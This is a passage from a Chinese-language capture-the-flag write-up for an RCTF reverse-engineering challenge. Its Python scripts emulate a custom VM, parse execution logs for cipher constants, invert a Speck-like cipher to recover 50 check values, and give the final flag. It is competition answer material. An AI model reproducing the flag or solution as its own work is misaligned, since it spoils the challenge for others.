recovered_input = decrypt_from_trace(expected_output)
print(f"解出 input_val = 0x{recovered_input:016x}")
check3的解密如下
mask64 = 0xFFFFFFFFFFFFFFFF
mask32 = 0xFFFFFFFF
def func_A_32bit(r_in):
r6 = (r_in >> 8) & mask32
r7 = (r_in << 24) & mask32
r6 = (r6 ^ r7) & mask32
return r6
def func_B_32bit(r0, r1):
r6 = r1
while True:
r7 = r0
r7 = (r7 & r6) & mask32
r0 = (r0 ^ r6) & mask32
if r7 == 0:
break
r7 = (r7 << 1) & mask32
r6 = r7
r0 &= mask32
return r0
def func_C_32bit(r0, r2):
return (r0 ^ r2) & mask32
def func_D_32bit(r_in):
r6 = (r_in << 3) & mask32
r7 = (r_in >> 29) & mask32
r6 = (r6 ^ r7) & mask32
return r6
def func_E_32bit(r0, r1):
return (r1 ^ r0) & mask32
def loop_64bit(r0, r6):
while True:
r7 = r0
r7 = (r7 & r6) & mask64
r0 = (r0 ^ r6) & mask64
if r7 == 0:
break
r7 = (r7 << 1) & mask64
r6 = r7
return r0
def build_r2_schedule():
"""
只跑 r2,r3,r4,r5 的“下半轮”,得到每一轮上半轮使用的 r2 常量。
"""
r2 = 0x71be74bc
r3 = 0x1d1a63b5
r4 = 0xaac04cfd
r5 = 0x3e36eee3
R2 = []
for k in range(27): # 0..26
R2.append(r2)
if k == 0x1a:
# 最后一轮没有下半轮
continue
r0_g_in = r3
r1_g_in = r2
r2_g_in = k
r0_H_A = func_A_32bit(r0_g_in)
r0_H_B = func_B_32bit(r0_H_A, r1_g_in)
r0_H_C = func_C_32bit(r0_H_B, r2_g_in)
r1_H_D = func_D_32bit(r1_g_in)
r1_H_E = func_E_32bit(r0_H_C, r1_H_D)
# 更新到下一轮
r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C
return R2
def rol32(x, n):
return ((x << n) | (x >> (32 - n))) & mask32
def ror32(x, n):
return ((x >> n) | (x << (32 - n))) & mask32
def inv_upper_round(r0_next, r1_next, r2_k):
"""
逆向一轮上半轮: 给定输出 (r0_next,r1_next) 和 r2_k,
求上一轮输入 (r0_prev,r1_prev)
"""
c0 = r0_next & mask32
e1 = r1_next & mask32
d1 = (e1 ^ c0) & mask32
r1_prev = ror32(d1, 3) # 逆 D: ROL3 -> ROR3
b0 = (c0 ^ r2_k) & mask32 # 逆 C: XOR r2_k
a0 = (b0 - r1_prev) & mask32 # 逆 B: 加法 -> 减法
r0_prev = rol32(a0, 8) # 逆 A: ROR8 -> ROL8
return r0_prev, r1_prev
def decrypt_from_cipher(cipher):
# 1) 先把最终 64 位 XOR 拆开
final_r0 = cipher & mask32
final_r1 = (cipher >> 32) & mask32
# 2) 逆 32 位主循环: 从 k=26..0 逐轮恢复
R2 = build_r2_schedule()
r0_curr, r1_curr = final_r0, final_r1
for k in reversed(range(27)): # 26,25,...,0
r2_k = R2[k]
r0_prev, r1_prev = inv_upper_round(r0_curr, r1_curr, r2_k)
r0_curr, r1_curr = r0_prev, r1_prev
r0_0, r1_0 = r0_curr, r1_curr
# 合并成 64 位,得到进入 32 位轮前的值
v = ((r1_0 & mask32) << 32) | (r0_0 & mask32)
# 3) 逆 64 位部分: 减常量 / XOR 常量
k1 = 0x52591d5fa111b92e
k2 = 0x9eaac37a5d0b1747
k3 = 0xb98bdad21178175e
k4 = 0x94c6e3f48118560b
c1 = 0xc7e29a0a50ac78e3
c2 = 0xead13c41399fcfd6
c3 = 0x15f909ccb556ec05
c4 = 0xe885b64f981d1baa
x = v & mask64
x = (x - k4) & mask64
x ^= c4
x = (x - k3) & mask64
x ^= c3
x = (x - k2) & mask64
x ^= c2
x ^= c1
x = (x - k1) & mask64
return x
if __name__ == "__main__":
cipher = 0x5538224d4c7a252a
pt = decrypt_from_cipher(cipher)
print(f"解出的明文: 0x{pt:016x}")
可以发现不止常量k、c、r不同,运算顺序也有所不同,具体表现在常量k,c的数量和speck加密(看到flag才了解到是这个)以及xor的顺序,其他部分是一致的
这就比较麻烦了,需要手动去盯帧下常量数据在日志里出现的逻辑以及运算顺序
在check了7、8轮左右基本找到规律,实现了一个简单的find功能,可以自动找到并排好k、c、r顺序,思路是定位关键指令,看代码和日志就知道我的逻辑了,不再赘述
with open("check8.log", "r") as f:
lines = f.readlines()
i = 0
result = []
nok = True
while i < len(lines):
if i < 10 and "RETVAL R7 = 0x00000000000000ff stored at dp=0xffef" in lines[i]:
i += 1
k = int(lines[i].split("LDI R6 = ")[1].split(",")[0], 16)
result.append([i, hex(k), "k"])
if "XOR R0 ^= imm64" in lines[i]:
c = int(lines[i].split("XOR R0 ^= imm64 ")[1].split(":")[0], 16)
result.append([i, hex(c), "c"])
line = lines[i]
if "CMP R7 == 0x0000000000000000? R7=0x0000000000000000, ZF=True" in line and nok:
i += 1
while "AND R7 &= R6:" not in lines[i]:
if "XOR R0 ^= imm64" in lines[i]:
c = int(lines[i].split("XOR R0 ^= imm64 ")[1].split(":")[0], 16)
result.append([i, hex(c), "c"])
if "LDI R1 = " in lines[i]:
r = int(lines[i].split("LDI R1 = ")[1].split(",")[0], 16)
rr1 = int.from_bytes(r.to_bytes(8, byteorder="little")[:4], byteorder="little")
rr2 = int.from_bytes(r.to_bytes(8, byteorder="little")[4:8], byteorder="little")
result.append([i, hex(rr1), "r"])
result.append([i, hex(rr2), "r"])
i += 1
line = lines[i]
k = int(line.split(" & ")[1].split(" ")[0], 16)
if k == 0xfffffffffffffff0:
nok = False
elif k != 1:
result.append([i, hex(k), "k"])
i += 1
print(result)
这里列出了上面代码的结果
[[15, '0xb70f19bde5399216', 'k'], [30, '0x5074d85b9194e696', 'c'], [48, '0xaa99b77363a30dcc', 'k'], [66, '0x8cb331163a92fc19', 'c'], [67, '0xe433713d', 'r'], [67, '0x36b1cc9f', 'r'], [70, '0x9c84ebd8', 'r'], [70, '0xf97646d6', 'r']]
手动很麻烦,50个数,所以尝试把VM、find、check解密三个代码合并在一起
import struct
MEM_SIZE = 0x10000
DATA_QWORD_BASE = 7168 # in qwords
DATA_BASE = DATA_QWORD_BASE * 8 # 0xE000
def u8(x): return x & 0xFF
def u16(x): return x & 0xFFFF
def u32(x): return x & 0xFFFFFFFF
def u64(x): return x & 0xFFFFFFFFFFFFFFFF
class VM:
def __init__(self, vmcode: bytes, input_ints=None, debug_after_n=None):
self.mem = bytearray(MEM_SIZE)
if len(vmcode) > DATA_BASE:
raise ValueError("vmcode too large")
self.mem[:len(vmcode)] = vmcode
# VM 状态
self.regs = [0] * 8 # s[0..7]
self.ip = 0 # 低 16 位:指令指针
self.dp = 0xFFFF # 高 16 位:数据/栈指针
self.base0 = 0 # LOWORD(v92)
self.base1 = 0 # WORD1(v92)
self.base2 = 0 # WORD2(v92)
self.zf = False # BYTE6(v92) —— 零标志
self.run_flag = True # HIBYTE(v92) —— 是否继续跑
self.output = None # 0x84 时记一下输出值
self.debug_ok = False
self.num = 0
self.debug_after_n = debug_after_n
# 输入整数写到内存后段
if input_ints is not None:
for idx, val in enumerate(input_ints):
if idx >= 50:
break
off = DATA_BASE + idx * 8
struct.pack_into("<Q", self.mem, off, u64(val))
self.log_file = open("vm.log", "w", encoding="utf-8")
# 内存读写辅助
def read_u8(self, addr):
addr &= 0xFFFF
return self.mem[addr]
def read_u16(self, addr):
addr &= 0xFFFF
if addr == 0xFFFF:
return self.mem[addr]
return self.mem[addr] | (self.mem[(addr + 1) & 0xFFFF] << 8)
def write_u8(self, addr, val):
addr &= 0xFFFF
self.mem[addr] = u8(val)
def read_u64(self, addr):
addr &= 0xFFFF
bs = bytes(self.mem[addr:addr+8] + self.mem[:max(0, addr+8-MEM_SIZE)])
return struct.unpack_from("<Q", bs, 0)[0]
def write_u64(self, addr, val):
addr &= 0xFFFF
b = struct.pack("<Q", u64(val))
for i in range(8):
self.mem[(addr + i) & 0xFFFF] = b[i]
def fetch_u8(self):
b = self.read_u8(self.ip)
self.ip = u16(self.ip + 1)
return b
def fetch_u16(self):
lo = self.read_u8(self.ip)
hi = self.read_u8(self.ip + 1)
self.ip = u16(self.ip + 2)
return (hi << 8) | lo
def step(self, debug=False):
ip0 = self.ip
opcode = self.fetch_u8()
def log(msg):
cond = (debug or self.debug_ok)
if self.debug_after_n is not None:
cond = cond and (self.num == self.debug_after_n-1)
if cond:
line = f"[IP={ip0:04x} OP={opcode:02x}] {msg}\n"
if hasattr(self, "log_file") and self.log_file is not None:
self.log_file.write(line)
self.log_file.flush()
else:
print(line, end="")
# 0x00: NOP
if opcode == 0x00:
log("NOP")
return 1
# 0x01: JMP imm16
elif opcode == 0x01:
imm = self.fetch_u16()
# log(f"JMP 0x{imm:04x}")
self.ip = imm
# 0x02: JNZ imm16 (推测:ZF==0 时跳转)
elif opcode == 0x02:
imm = self.fetch_u16()
# log(f"JNZ 0x{imm:04x}, ZF={self.zf}")
if not self.zf:
self.ip = imm
# 0x03: JZ imm16 (推测:ZF==1 时跳转)
elif opcode == 0x03:
imm = self.fetch_u16()
# log(f"JZ 0x{imm:04x}, ZF={self.zf}")
if self.zf:
self.ip = imm
# 0x11: 设置 base0(LOWORD(v92))
elif opcode == 0x11:
imm = self.fetch_u16()
# log(f"SET base0 = 0x{imm:04x}")
self.base0 = imm
# 0x12: 设置 base1(WORD1(v92))
elif opcode == 0x12:
imm = self.fetch_u16()
# log(f"SET base1 = 0x{imm:04x}")
self.base1 = imm
# 0x15: R[reg] = QWORD[mem[base0]]
elif opcode == 0x15:
reg = self.fetch_u8()
if reg >= 8:
# raise IndexError("reg out of range in 0x15")
return 0
val = self.read_u64(self.base0)
# log(f"LDQ R{reg} = [0x{self.base0:04x}] => 0x{val:016x}")
self.regs[reg] = val
# 0x16: R[reg] = imm64
elif opcode == 0x16:
reg = self.fetch_u8()
if reg >= 8:
return 0
# raise IndexError("reg out of range in 0x16")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
self.regs[reg] = imm
self.zf = (imm == 0)
log(f"LDI R{reg} = 0x{imm:016x}, ZF={self.zf}")
# 0x17: R[dst] = R[src]
elif opcode == 0x17:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
return 0
# raise IndexError("reg out of range in 0x17")
self.regs[dst] = self.regs[src]
self.zf = (self.regs[dst] == 0)
# log(f"MOV R{dst} = R{src} (0x{self.regs[dst]:016x}), ZF={self.zf}")
# 0x18: R[reg] = QWORD[mem[base0 + offset16]]
elif opcode == 0x18:
reg = self.fetch_u8()
off = self.fetch_u16()
if reg >= 8:
return 0
# raise IndexError("reg out of range in 0x18")
addr = u16(self.base0 + off)
val = self.read_u64(addr)
self.regs[reg] = val
if reg == 0:
self.debug_ok = True
log(f"LDQ R{reg} = [base0 + 0x{off:04x}] @0x{addr:04x} => 0x{val:016x}")
# 0x19: QWORD[mem[base0]] = R[reg]
elif opcode == 0x19:
reg = self.fetch_u8()
if reg >= 8:
return 0
# raise IndexError("reg out of range in 0x19")
self.write_u64(self.base0, self.regs[reg])
# log(f"STQ [0x{self.base0:04x}] = R{reg} (0x{self.regs[reg]:016x})")
# 0x1A: R[dst] = byte[mem[base0 + (u16)R[src]]]
elif opcode == 0x1A:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
return 0
# raise IndexError("reg out of range in 0x1A")
idx = u16(self.regs[src])
addr = u16(self.base0 + idx)
val = self.read_u8(addr)
self.regs[dst] = val
# log(f"LDB R{dst} = [base0 + (u16)R{src}] @0x{addr:04x} => 0x{val:02x}")
# 0x1B: byte[mem[base0 + (u16)R[src]]] = (u8)R[dst]
elif opcode == 0x1B:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
return 0
# raise IndexError("reg out of range in 0x1B")
idx = u16(self.regs[src])
addr = u16(self.base0 + idx)
val = u8(self.regs[dst])
self.write_u8(addr, val)
# log(f"STB [base0 + (u16)R{src}] @0x{addr:04x} = R{dst}.lo (0x{val:02x})")
# 0x1C: R[reg]++ ; ZF = (old == -1)
elif opcode == 0x1C:
reg = self.fetch_u8()
if reg >= 8:
return 0
# raise IndexError("reg out of range in 0x1C")
old = self.regs[reg]
self.regs[reg] = u64(old + 1)
self.zf = (old == 0xFFFFFFFFFFFFFFFF)
# log(f"INC R{reg}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x1D: R[reg]-- ; ZF = (old == 1)
elif opcode == 0x1D:
reg = self.fetch_u8()
if reg >= 8:
return 0
# raise IndexError("reg out of range in 0x1D")
old = self.regs[reg]
self.regs[reg] = u64(old - 1)
self.zf = (old == 1)
# log(f"DEC R{reg}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x1E: R[reg] >>= shift8 ; ZF = (result == 0)
elif opcode == 0x1E:
reg = self.fetch_u8()
shift = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x1E")
val = self.regs[reg]
res = u64(val >> (shift & 0x3F))
self.regs[reg] = res
self.zf = (res == 0)
# log(f"SHR R{reg} >>= {shift & 0x3F}: 0x{val:016x} -> 0x{res:016x}, ZF={self.zf}")
# 0x1F: base0 += (u16)R[reg]
elif opcode == 0x1F:
reg = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x1F")
old = self.base0
self.base0 = u16(self.base0 + u16(self.regs[reg]))
# log(f"ADD base0 += (u16)R{reg}: 0x{old:04x} -> 0x{self.base0:04x}")
# 0x25: AND 寄存器
elif opcode == 0x25:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
return 0 #raise IndexError("reg out of range in 0x25")
old = self.regs[dst]
self.regs[dst] = u64(old & self.regs[src])
self.zf = (self.regs[dst] == 0)
log(f"AND R{dst} &= R{src}: 0x{old:016x} & 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x}, ZF={self.zf}")
# 0x26: XOR 寄存器
elif opcode == 0x26:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
return 0 #raise IndexError("reg out of range in 0x26")
old = self.regs[dst]
self.regs[dst] = u64(old ^ self.regs[src])
self.zf = (self.regs[dst] == old) # 等价于 src == 0
log(f"XOR R{dst} ^= R{src}: 0x{old:016x} ^ 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x}, ZF={self.zf}")
# 0x27: R[reg] <<= shift8 ; ZF = (result == 0)
elif opcode == 0x27:
reg = self.fetch_u8()
shift = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x27")
val = self.regs[reg]
res = u64(val << (shift & 0x3F))
self.regs[reg] = res
self.zf = (res == 0)
# log(f"SHL R{reg} <<= {shift & 0x3F}: 0x{val:016x} -> 0x{res:016x}, ZF={self.zf}")
# 0x29: R[reg] ^= imm64 ; ZF = (old == imm)
elif opcode == 0x29:
reg = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x29")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
old = self.regs[reg]
self.regs[reg] = u64(old ^ imm)
self.zf = (old == imm)
log(f"XOR R{reg} ^= imm64 0x{imm:016x}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x2A: R[reg] &= imm64 ; ZF = (result == 0)
elif opcode == 0x2A:
reg = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x2A")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
old = self.regs[reg]
self.regs[reg] = u64(old & imm)
self.zf = (self.regs[reg] == 0)
# log(f"AND R{reg} &= imm64 0x{imm:016x}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x2B: R[dst] = byte[mem[base1 + (u16)R[src]]]
elif opcode == 0x2B:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
return 0
idx = u16(self.regs[src])
addr = u16(self.base1 + idx)
val = self.read_u8(addr)
self.regs[dst] = val
# log(f"LDB R{dst} = [base1 + (u16)R{src}] @0x{addr:04x} => 0x{val:02x}")
# 0x2C: byte[mem[base1 + (u16)R[src]]] = (u8)R[dst]
elif opcode == 0x2C:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
return 0 #raise IndexError("reg out of range in 0x2C")
idx = u16(self.regs[src])
addr = u16(self.base1 + idx)
val = u8(self.regs[dst])
self.write_u8(addr, val)
# log(f"STB [base1 + (u16)R{src}] @0x{addr:04x} = R{dst}.lo (0x{val:02x})")
# 0x32: ZF = (R[reg] == imm64)
elif opcode == 0x32:
reg = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x32")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
self.zf = (self.regs[reg] == imm)
log(f"CMP R{reg} == 0x{imm:016x}? R{reg}=0x{self.regs[reg]:016x}, ZF={self.zf}")
if reg == 0:
self.zf = True
self.debug_ok = False
self.num += 1
if self.num == self.debug_after_n:
return 1
# 0x80: 把当前 ip 记到 base2,作为“函数起点”
elif opcode == 0x80:
self.base2 = self.ip
# log(f"SET base2 = ip = 0x{self.ip:04x}")
# 0x81: 注册函数:table[idx] = base2 + 3
elif opcode == 0x81:
idx = self.fetch_u8()
if not hasattr(self, "fun_table"):
self.fun_table = {}
self.fun_table[idx] = u16(self.base2 + 3)
# log(f"DEF FN[{idx}] = 0x{self.fun_table[idx]:04x}")
# 0x82: call 函数:压栈返回地址,再跳转
elif opcode == 0x82:
idx = self.fetch_u8()
if not hasattr(self, "fun_table") or idx not in self.fun_table:
return 0
# raise KeyError(f"function idx {idx} not registered")
ret = self.ip
self.dp = u16(self.dp - 2)
self.write_u8(self.dp, ret & 0xFF)
self.write_u8(self.dp + 1, (ret >> 8) & 0xFF)
self.ip = self.fun_table[idx]
# log(f"CALL FN[{idx}] -> 0x{self.ip:04x}, push RET=0x{ret:04x} at dp=0x{self.dp:04x}")
# 0x83: ret:从栈顶弹出返回地址到 ip
elif opcode == 0x83:
if self.dp == 0xFFFF:
# log("RET with empty stack -> halt")
self.run_flag = False
return 1
lo = self.read_u8(self.dp)
hi = self.read_u8(self.dp + 1)
ret = (hi << 8) | lo
self.dp = u16(self.dp + 2)
# log(f"RET to 0x{ret:04x}, new dp=0x{self.dp:04x}")
self.ip = ret
# 0x84: 输出 R[reg](写到栈上),然后退出 VM
elif opcode == 0x84:
reg = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x84")
self.dp = u16(self.dp - 8)
self.write_u64(self.dp, self.regs[reg])
self.output = self.regs[reg]
log(f"RETVAL R{reg} = 0x{self.regs[reg]:016x} stored at dp=0x{self.dp:04x}, HALT")
# self.run_flag = False
# 0x85: R[reg] = QWORD[mem[dp]] ; dp += 8
elif opcode == 0x85:
reg = self.fetch_u8()
if reg >= 8:
return 0 #raise IndexError("reg out of range in 0x85")
val = self.read_u64(self.dp)
self.regs[reg] = val
self.dp = u16(self.dp + 8)
# log(f"POPQ R{reg} = [dp] => 0x{val:016x}, new dp=0x{self.dp:04x}")
# 0x90: 系统调用(这里还没实现)
elif opcode == 0x90:
arg = self.fetch_u8()
log(f"SYSCALL 0x90 arg=0x{arg:02x} (NOT IMPLEMENTED) -> HALT")
# self.run_flag = False
else:
log(f"UNKNOWN opcode -> HALT")
# self.run_flag = False
def run(self, debug=False):
steps = 0
try:
while self.run_flag:
a = self.step(debug=debug)
if a == 0:
self.log_file.close()
break
steps += 1
return self.output
finally:
if hasattr(self, "log_file") and self.log_file is not None:
self.log_file.close()
self.log_file = None
def run_vm_with_ints(ints, vmcode_path="full_vmcode", debug=False, debug_after_n=9):
with open(vmcode_path, "rb") as f:
code = f.read()
vm = VM(code, input_ints=ints, debug_after_n=debug_after_n)
out = vm.run(debug=debug)
return out, vm
mask64 = 0xFFFFFFFFFFFFFFFF
mask32 = 0xFFFFFFFF
# ---------- 基础函数: 与日志同构 ----------
def loop_64bit(r0, r6):
while True:
r7 = r0
r7 = (r7 & r6) & mask64
r0 = (r0 ^ r6) & mask64
if r7 == 0:
break
r7 = (r7 << 1) & mask64
r6 = r7
return r0
def func_A_32bit(r_in):
r6 = (r_in >> 8) & mask32
r7 = (r_in << 24) & mask32
r6 = (r6 ^ r7) & mask32
return r6
def func_B_32bit(r0, r1):
r6 = r1
while True:
r7 = r0
r7 = (r7 & r6) & mask32
r0 = (r0 ^ r6) & mask32
if r7 == 0:
break
r7 = (r7 << 1) & mask32
r6 = r7
r0 &= mask32
return r0
def func_C_32bit(r0, r2):
return (r0 ^ r2) & mask32
def func_D_32bit(r_in):
r6 = (r_in << 3) & mask32
r7 = (r_in >> 29) & mask32
r6 = (r6 ^ r7) & mask32
return r6
def func_E_32bit(r0, r1):
return (r1 ^ r0) & mask32
# ---------- 轮常量调度 R2[k] ----------
def build_r2_schedule(r):
"""
只跑 r2,r3,r4,r5 的“下半轮”,得到每一轮上半轮使用的 r2 常量。
"""
r2 = r[0]
r3 = r[1]
r4 = r[2]
r5 = r[3]
R2 = []
for k in range(27): # 0..26
R2.append(r2)
if k == 0x1a:
# 最后一轮没有下半轮
continue
r0_g_in = r3
r1_g_in = r2
r2_g_in = k
r0_H_A = func_A_32bit(r0_g_in)
r0_H_B = func_B_32bit(r0_H_A, r1_g_in)
r0_H_C = func_C_32bit(r0_H_B, r2_g_in)
r1_H_D = func_D_32bit(r1_g_in)
r1_H_E = func_E_32bit(r0_H_C, r1_H_D)
# 更新到下一轮
r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C
return R2
# ---------- 上半轮显式逆 ----------
def rol32(x, n):
return ((x << n) | (x >> (32 - n))) & mask32
def ror32(x, n):
return ((x >> n) | (x << (32 - n))) & mask32
def inv_upper_round(r0_next, r1_next, r2_k):
"""
逆向一轮上半轮: 给定输出 (r0_next,r1_next) 和 r2_k,
求上一轮输入 (r0_prev,r1_prev)
"""
c0 = r0_next & mask32
e1 = r1_next & mask32
d1 = (e1 ^ c0) & mask32
r1_prev = ror32(d1, 3) # 逆 D: ROL3 -> ROR3
b0 = (c0 ^ r2_k) & mask32 # 逆 C: XOR r2_k
a0 = (b0 - r1_prev) & mask32 # 逆 B: 加法 -> 减法
r0_prev = rol32(a0, 8) # 逆 A: ROR8 -> ROL8
return r0_prev, r1_prev
# ints =[13430028123848624410, 13767982679358783948, 11713643540287541804, 8785781270016547275, 5592440162506734093, 18308193844343275176, 1734829927, 12474808138286712448, 14773488025708418042, 6145507630794926191, 1802201963, 15600888960577064236, 6903078875579093773, 1852730990, 13105847985596755079, 12401591929655495169, 14481374110727130427, 3919366872831373201, 11451939409513851430, 1953789044, 17235855896972825888, 1987475062, 1916851354365983645, 2021161080, 2038004089, 2054847098, 17641256427711907975, 10954895412222869047, 9086595392298378073, 5295387722887053174, 15356410353063384153, 12187465423418120720, 14608926774405230659, 16160493834789769285, 1229539657, 13841060151611699047, 1263225675, 1280068684, 10181670230088315432, 1313754702, 1330597711, 5725376311369793868, 12817717089813452135, 11273537721551939182, 3076809482903728308, 1414812756, 1431655765, 6802938463641799296, 11625777768394830813, 1482184792]
# kkk =35
ints = [13430028123848624410, 13767982679358783948, 11713643540287541804, 8785781270016547275, 5592440162506734093, 18308193844343275176, 1734829927, 12474808138286712448, 14773488025708418042, 6145507630794926191, 1802201963, 15600888960577064236, 6903078875579093773, 1852730990, 13105847985596755079, 12401591929655495169, 14481374110727130427, 3919366872831373201, 11451939409513851430, 1953789044, 17235855896972825888, 1987475062, 1916851354365983645, 2021161080, 2038004089, 2054847098, 17641256427711907975, 13917286480390178951, 9086595392298378073, 5295387722887053174, 15356410353063384153, 12187465423418120720, 14608926774405230659, 16160493834789769285, 1229539657, 13841060151611699047, 1263225675, 1280068684, 10181670230088315432, 1313754702, 1330597711, 5725376311369793868, 12817717089813452135, 11273537721551939182, 3076809482903728308, 1414812756, 1431655765, 6802938463641799296, 11625777768394830813, 1482184792]
kkk = 35
while kkk <= 50:
result = []
out, vm = run_vm_with_ints(ints, vmcode_path="full_vmcode", debug=False, debug_after_n=kkk)
with open("vm.log", "r", encoding="utf-8") as f:
lines = f.readlines()
input_value = 0
i = 0
nok = True
while i < len(lines):
if i < 10 and "RETVAL R7 = 0x00000000000000ff stored at dp=0xffef" in lines[i]:
i += 1
k = int(lines[i].split("LDI R6 = ")[1].split(",")[0], 16)
result.append([i, k, "k"])
if "XOR R0 ^= imm64" in lines[i]:
c = int(lines[i].split("XOR R0 ^= imm64 ")[1].split(":")[0], 16)
result.append([i, c, "c"])
line = lines[i]
if "CMP R7 == 0x0000000000000000? R7=0x0000000000000000, ZF=True" in line and nok:
i += 1
while "AND R7 &= R6:" not in lines[i]:
if "XOR R0 ^= imm64" in lines[i]:
c = int(lines[i].split("XOR R0 ^= imm64 ")[1].split(":")[0], 16)
result.append([i, c, "c"])
if "LDI R1 = " in lines[i]:
r = int(lines[i].split("LDI R1 = ")[1].split(",")[0], 16)
rr1 = int.from_bytes(r.to_bytes(8, byteorder="little")[:4], byteorder="little")
rr2 = int.from_bytes(r.to_bytes(8, byteorder="little")[4:8], byteorder="little")
result.append([i, rr1, "r"])
result.append([i, rr2, "r"])
i += 1
line = lines[i]
k = int(line.split(" & ")[1].split(" ")[0], 16)
if k == 0xfffffffffffffff0:
nok = False
elif k != 1:
result.append([i, k, "k"])
if " => " in lines[i]:
input_value = int(lines[i].split(" => ")[1], 16)
print(hex(input_value))
if "CMP R0 == " in lines[i]:
cipher = int(line.split("CMP R0 == ")[1].split("?")[0], 16)
print(hex(cipher))
print(result)
final_r0 = cipher & mask32
final_r1 = (cipher >> 32) & mask32
r = [i[1] for i in result[-4:]]
# 2) 逆 32 位主循环: 从 k=26..0 逐轮恢复
R2 = build_r2_schedule(r)
r0_curr, r1_curr = final_r0, final_r1
for k in reversed(range(27)): # 26,25,...,0
r2_k = R2[k]
r0_prev, r1_prev = inv_upper_round(r0_curr, r1_curr, r2_k)
r0_curr, r1_curr = r0_prev, r1_prev
r0_0, r1_0 = r0_curr, r1_curr
# 合并成 64 位,得到进入 32 位轮前的值
v = ((r1_0 & mask32) << 32) | (r0_0 & mask32)
x = v & mask64
for ck in result[:-4][::-1]:
if ck[2] == 'k':
x = (x - ck[1]) & mask64
elif ck[2] == 'c':
x ^= ck[1]
idx = ints.index(input_value)
ints[idx] = x
print(kkk, ints)
kkk += 1
result = []
break
i += 1
其中kkk是第几个check,具体逻辑是每次启动VM打印最后一轮(借助debug_after_n)check的日志(从数据读取开始到cmp),写入vm.log,vm里面在错误check的下一轮就会返回0导致vm退出,开始读取vm.log,使用find找到c、k、r等常量,同时提取出输入数值和cmp数值,找到cmp数值就开始做解密,由于代码都一样,只需根据c、k顺序修改x的计算即可,得到新的值替换掉ints里的输入数值,并打印新的ints
估计差不多30min能跑完,打印出最终的50个数,输入程序即可获取flag为RCTF{VM_ALU_SMC_RC4_SPECK!_593eb6079d2da6c187ed462b033fee34}